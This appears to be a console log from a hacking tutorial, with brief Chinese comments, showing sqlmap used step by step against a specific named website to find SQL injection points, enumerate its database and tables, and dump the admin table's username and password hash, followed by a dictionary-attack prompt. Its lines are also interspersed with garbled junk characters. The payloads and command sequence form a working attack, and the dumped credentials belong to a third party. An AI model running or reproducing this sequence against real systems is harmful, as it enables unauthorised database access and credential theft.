D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. e8 a2 L" A9 v4 |, o5 Tms "Mysql" --current-user /* 注解:获取当前用户名称
+ Y, z& o( g- x; G! B+ l7 b sqlmap/0.9 - automatic SQL injection and database takeover tool0 v9 J* x9 M) L
http://sqlmap.sourceforge.net starting at: 16:53:54! h( o s' I) I2 j9 k
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) j' \( N) b k; X' a0 V
session file. _' k$ I0 ^) T2 V4 q0 p; o; t
[16:53:54] [INFO] resuming injection data from session file
: a6 B9 p8 M7 Y! F[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; n: m& z/ G9 v* X3 ]
[16:53:54] [INFO] testing connection to the target url
' O% u5 F$ K. A Zsqlmap identified the following injection points with a total of 0 HTTP(s) reque! q, m7 m& ~" |" z ]" Y
sts:
' _* x0 {, N( @---
* D+ r+ i# `0 ~+ D. K, [Place: GET
0 G- t( F- m% T) k: HParameter: id
8 |2 E2 j/ |8 q$ i Type: boolean-based blind
- H0 Y) }% B$ A6 w1 T0 }: X j: n Title: AND boolean-based blind - WHERE or HAVING clause! L6 S0 n1 e1 P& n5 S7 {, k
Payload: id=276 AND 799=799" Q/ u. D: T" y0 H, \& e. T5 u
Type: error-based
) Z, w6 z$ \1 f+ \( H0 N Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. C- }+ @4 X3 p% T3 k
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 V6 L8 t7 u/ L- L- Q) n6 ~ v
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ e( L9 }+ u, Q. \; P),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' ~$ c: V7 B) a& E0 G1 f5 V
Type: UNION query
4 N5 F. e+ z0 P8 K& \4 P8 ~ Title: MySQL UNION query (NULL) - 1 to 10 columns$ v( Q4 [8 y3 D$ U6 k6 [7 \4 I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ W% b |" y5 @9 |" k( [(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* @. p( I- r* P+ h8 p
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& m: C3 `" T: Q. R- f Type: AND/OR time-based blind' b6 q4 k" `. V; R0 j" e% u
Title: MySQL > 5.0.11 AND time-based blind- o) o; I0 o _& |# B- L
Payload: id=276 AND SLEEP(5)( k6 L) O% R$ j9 l% Z# F
---
1 S: T( `. D4 f$ ?[16:53:55] [INFO] the back-end DBMS is MySQL
) m4 f2 _ K$ X) g z8 C, bweb server operating system: Windows
3 F( e4 u3 _7 P- x! T4 F* zweb application technology: Apache 2.2.11, PHP 5.3.0+ q7 Y) \# X( v6 n) L" f
back-end DBMS: MySQL 5.0( `# W* V H* `
[16:53:55] [INFO] fetching current user. {- q- g% w" O! g: o* _
current user: 'root@localhost' / |! O1 e6 k+ E! S( h
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
u7 ^7 o2 f9 P3 L, I$ ptput\www.wepost.com.hk' shutting down at: 16:53:581 o% r3 _: ~- x' O7 _
: j: W% Z9 E. H! V' Y! e E3 V5 q2 TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. q! o+ {; x% \
ms "Mysql" --current-db /*当前数据库( z, j ^% K4 q7 d! A7 `- B+ g/ J
sqlmap/0.9 - automatic SQL injection and database takeover tool
9 g, K# Y: A& e http://sqlmap.sourceforge.net starting at: 16:54:16
2 f/ R4 {6 @% }9 F& L& W( \[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# W5 ~% ?- r* e. }
session file, s0 ^" ], C3 ~% r0 @
[16:54:16] [INFO] resuming injection data from session file
; @' }4 h8 W6 Y% ]' P[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) n0 n: ?* k% n( f) ~8 X
[16:54:16] [INFO] testing connection to the target url
q/ f4 B1 q/ x) `7 Msqlmap identified the following injection points with a total of 0 HTTP(s) reque( O) K6 H8 z1 `4 T2 c
sts:2 M) O/ S* U2 R6 N% r
---5 X& }9 }$ J2 T% Z
Place: GET$ U* i5 v7 \9 o. E+ X
Parameter: id* e) A+ s" d2 I# C9 t! o
Type: boolean-based blind
- o1 H5 w, n1 L: \( ] Title: AND boolean-based blind - WHERE or HAVING clause
5 I" P1 t1 m1 o! ?2 o6 S! { Payload: id=276 AND 799=7992 G7 @2 k6 R3 l2 ]! W; I1 {
Type: error-based; a" i" }& f$ N) b" c
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( V: {' |* L, [0 f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. ?8 v4 N [6 Y2 J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! V) ]6 Z" N9 ~& x
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) r9 h- B: F% o
Type: UNION query
: A7 d: V( t7 q1 B Title: MySQL UNION query (NULL) - 1 to 10 columns' E7 ^0 ^; k1 Q+ a2 H; \
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% X# c% V* `# J- t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% B$ _ r9 w1 |6 `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! L. O- @% _* g' m Type: AND/OR time-based blind% \: Y+ l5 q* O5 Z: a/ B
Title: MySQL > 5.0.11 AND time-based blind
: O- k M7 E8 X9 G. f# X/ K Payload: id=276 AND SLEEP(5)
! h! O; ~/ s# \. f0 F* A& C1 A---
3 b' t/ A& _) p[16:54:17] [INFO] the back-end DBMS is MySQL
, e; w/ M1 Z% `) X; |6 b) N- e* v0 {web server operating system: Windows
; b0 s2 X3 g! C; R- Bweb application technology: Apache 2.2.11, PHP 5.3.0
! V* f1 W7 Z+ B8 U3 O8 Sback-end DBMS: MySQL 5.0, H }5 P1 y, d0 @/ c
[16:54:17] [INFO] fetching current database$ M. m& L# t0 M% E+ `; C
current database: 'wepost'$ m# n% s8 j- t7 D1 V0 j5 k
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
0 a0 X; c8 v' i4 d }0 ctput\www.wepost.com.hk' shutting down at: 16:54:18! V- N# A6 N( p
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% r& ?5 h6 @$ F& gms "Mysql" --tables -D "wepost" /*获取当前数据库的表名1 F6 v8 y; W, k M( ^* l
sqlmap/0.9 - automatic SQL injection and database takeover tool
# g! \9 I' ^. V1 e: y http://sqlmap.sourceforge.net starting at: 16:55:255 O$ e S% ]7 y6 E% T! H: Z& K1 q! W1 I
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as. i& e* s5 i0 ^& ^( Y! ~
session file
8 `9 {4 }2 c- ^7 d: ~[16:55:25] [INFO] resuming injection data from session file$ B, |8 Y( R5 W1 S. ~
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ q% W" H- e# O5 R[16:55:25] [INFO] testing connection to the target url
i, Y4 J9 q- b, |; R- l+ Isqlmap identified the following injection points with a total of 0 HTTP(s) reque" Q2 ]) K5 x- ]- X- |1 [
sts:8 M. d2 f h$ i$ t* A# _6 y- a
---
7 h% a& }% O& n7 E c" TPlace: GET1 l, C* Q, z2 [; A! h3 m
Parameter: id
7 F5 u$ }- a1 _$ g/ p Type: boolean-based blind
6 L3 Y/ z! r# u5 b, d2 W2 Y2 ` Title: AND boolean-based blind - WHERE or HAVING clause- _8 X8 U1 d7 J# X: }- o
Payload: id=276 AND 799=799
* a; K" p# T4 K2 ^: C7 L7 z4 ]4 Y Type: error-based1 c7 J0 a9 l: f! f+ d
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 I+ L, y: ?9 U8 O- M* M7 } Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 w' w* K$ M- K/ k# _9 x
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* ?8 D7 ^, p7 N
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 O' w( r0 @4 q2 c& M Type: UNION query
! W+ n; j" Z% \! l ? Title: MySQL UNION query (NULL) - 1 to 10 columns6 w1 O* }/ n, q& Q X7 j6 G1 F
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" F5 V; i$ O, `5 ~; H' Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; q! m+ w/ j8 Z" _CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' S9 }" f$ H# s2 N, ~: x& C
Type: AND/OR time-based blind
( a6 S+ r9 ^, `& r7 u3 Y+ j3 z Title: MySQL > 5.0.11 AND time-based blind- @7 Z& H K2 |! t
Payload: id=276 AND SLEEP(5)
2 N" D# d4 |8 L* E3 f---
. m8 N: L6 v# w/ }: E+ |9 a[16:55:26] [INFO] the back-end DBMS is MySQL# b* J+ C, f$ F' h! d
web server operating system: Windows
/ j# K6 l6 {& Tweb application technology: Apache 2.2.11, PHP 5.3.0) U6 y0 h. l" c9 _% w* S
back-end DBMS: MySQL 5.0+ [# ^8 w( T- v5 D; u* N* Z8 z
[16:55:26] [INFO] fetching tables for database 'wepost': c+ v6 F3 W+ r8 f7 ^, _! V
[16:55:27] [INFO] the SQL query used returns 6 entries
d2 l2 n' M1 N: g/ p% _; m Q0 }* UDatabase: wepost1 e% [( \" I6 y; B) y
[6 tables]
) F+ A6 a+ s, i4 {( p/ f; A+-------------+6 ]% v; U- o5 Z" u' X
| admin |
4 r- P, m" U- l# ^5 ?6 N) t| article |( a/ {) w, u0 d9 N" I# q& m. `6 E
| contributor |3 \. K- F9 n8 u% L& |& [% E- z
| idea |3 K5 m) l z5 U6 F3 f+ I/ \
| image |4 f, ~- K: J# [8 h$ W
| issue |
1 q7 b$ @# L4 ~6 K# Y5 H5 @3 ]) E+-------------+
6 }1 K; [) X' Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; T% R t! J8 E! V4 `3 _) d
tput\www.wepost.com.hk' shutting down at: 16:55:33
4 `( Q. R4 \5 A5 U. s3 n
2 Z6 v$ x& o% E% J+ S3 x; Z. o' xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 { U" h3 A1 M; T% p1 v f. j
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名( F. f1 N2 T* @* _
sqlmap/0.9 - automatic SQL injection and database takeover tool, I* a. c/ A k- n0 G [
http://sqlmap.sourceforge.net starting at: 16:56:06
2 Z( O6 z8 [& }$ u0 P/ Tsqlmap identified the following injection points with a total of 0 HTTP(s) reque+ f8 Q0 t6 }9 x% X8 o& W; V0 o. z
sts:
8 `# V) O" D% G8 C9 d---
- I9 \. A5 I9 X5 ?1 `Place: GET7 y$ X3 n7 {* r8 \- A1 K0 y. l
Parameter: id! [1 z# M) f. @( r
Type: boolean-based blind: }5 W3 B e! H; z, n' l8 B+ g( j
Title: AND boolean-based blind - WHERE or HAVING clause0 L6 R9 e* w3 f% a" i
Payload: id=276 AND 799=799
' j c$ K+ b' N" h! M, g: ]. W Type: error-based# g! m) r0 \) ~! L( N4 }3 `( f& S1 A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ w, l; P) a ?( f, w Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 y. O, S! p+ ^ N120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# x6 W1 n) }. Q" P: p; T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! n( P9 V7 F' Q: `
Type: UNION query. o8 E; [7 t b$ h' h) P& k/ i
Title: MySQL UNION query (NULL) - 1 to 10 columns
, X/ z# U' m* j _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ z' h Q' a0 C2 f7 c4 V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 g5 u2 d+ ?' h! e2 ]0 `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 l) f# c. N1 T0 q
Type: AND/OR time-based blind
; h1 U W; x7 z; [ Title: MySQL > 5.0.11 AND time-based blind# U7 |/ K6 N" m$ G i( c5 {; s& y+ g
Payload: id=276 AND SLEEP(5)" w4 y4 N7 d+ _* c1 E! P
---
3 ]; {4 v* @" O3 H2 x/ Yweb server operating system: Windows
6 r$ a$ y) p# ~; ]" p t) _) Mweb application technology: Apache 2.2.11, PHP 5.3.0
7 K5 p0 o$ F2 e/ d7 c9 _# jback-end DBMS: MySQL 5.0
9 P9 p8 \6 [: D0 v[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se V7 R: S" @: D7 Z% j
ssion': wepost, wepost
; ?" ~) y: X# CDatabase: wepost
, Y) q w2 G9 y* JTable: admin4 G* n6 u+ J) O8 N1 K1 j) H
[4 columns]
Q& i; S) `$ M3 j" x" t+----------+-------------+# t+ ~2 T8 a8 K' b
| Column | Type |
( L8 B0 I, Q5 z# B, j: C3 d+----------+-------------+
) W2 l( N8 F F! d+ R: T| id | int(11) |
! r; W6 H/ M# A6 b| password | varchar(32) |7 g, R8 T- O8 }4 y
| type | varchar(10) |
; S3 H1 M- {: y$ B0 s& U5 M* J| userid | varchar(20) | x' \$ i0 ^ W! ^. c' _
+----------+-------------+$ X9 p; K c8 X
shutting down at: 16:56:19
8 {! n# |+ K" T# u3 g( h; z
, G3 R1 z" _! p) yD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 Q' J: @2 G. h/ D+ }' J( i T9 [$ x7 z
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
3 P$ a' M, s' Q% r' M2 x sqlmap/0.9 - automatic SQL injection and database takeover tool) K- F# t, Z& C. x! E5 E0 i. ?
http://sqlmap.sourceforge.net starting at: 16:57:149 B5 n+ P# h4 c% ]! R0 d/ {2 ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 L$ n, X- G. ]' csts:
) @) M) o/ N7 c' l) T. |---
- E/ w" |5 a' Z+ ~, { k- A0 NPlace: GET
3 I- G; e! E0 E* f% B2 U" ^Parameter: id4 d- s1 B4 G/ U; E6 r
Type: boolean-based blind
4 |: A1 J& i. f- v0 e1 \ Title: AND boolean-based blind - WHERE or HAVING clause4 A" o& P& e2 P
Payload: id=276 AND 799=7998 j+ Q- e1 @0 l1 O
Type: error-based
* n1 P8 Y+ e/ v4 K* u# _ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( T2 \& J8 z4 I1 q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 v. P# f! f0 o }# K" ?120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' F, ~+ u1 I/ J2 M0 G
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
U* x/ l* l' A% l+ q: A( ` Type: UNION query
& m. f, J* R7 q; R& ? Title: MySQL UNION query (NULL) - 1 to 10 columns, ^. O! }& L- e( ?8 v4 x* B
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: E4 ^- E, s4 Z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 Q3 U4 B2 r0 g2 ]. j: `2 pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 U+ G1 X$ m; d3 L
Type: AND/OR time-based blind; O9 f, T# K5 }
Title: MySQL > 5.0.11 AND time-based blind( C" h1 b* p% \8 D1 _ H- X
Payload: id=276 AND SLEEP(5)
' b& u( ?3 b3 l# D }6 u---& s3 M: h$ e7 E! k, u# k) o! `! Y
web server operating system: Windows" Z3 T% e) h( E2 k
web application technology: Apache 2.2.11, PHP 5.3.0
" S9 g3 P9 h$ T( P; W* X1 P5 bback-end DBMS: MySQL 5.0
6 \! m. d) @8 I# _& [recognized possible password hash values. do you want to use dictionary attack o5 j8 S$ d; y. o7 j+ r/ b- I0 h
n retrieved table items? [Y/n/q] y
$ U( H; S4 z9 B6 |1 Jwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
$ j5 I1 A3 Q% Ido you want to use common password suffixes? (slow!) [y/N] y/ \8 Y! U2 ^ }4 p, v5 E* W
Database: wepost7 O% P) w1 x7 ~3 X9 O' ]& n6 E
Table: admin
* j$ [% [$ P+ `, q x; ~4 O1 M/ o: m; `[1 entry]8 j2 S+ f+ u% {9 q
+----------------------------------+------------+
; t* @; M. Y/ D# C7 {| password | userid |3 U; s0 _( y( W% S0 I
+----------------------------------+------------+ l# g( F9 g: S1 r
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
7 f+ t9 f+ D, I" y! H+----------------------------------+------------+
8 P; K% C! e( Y( ^8 m( H shutting down at: 16:58:14* E, V; y3 W) O: b" p
& K5 u8 L6 M" l7 W& ] FD:\Python27\sqlmap> |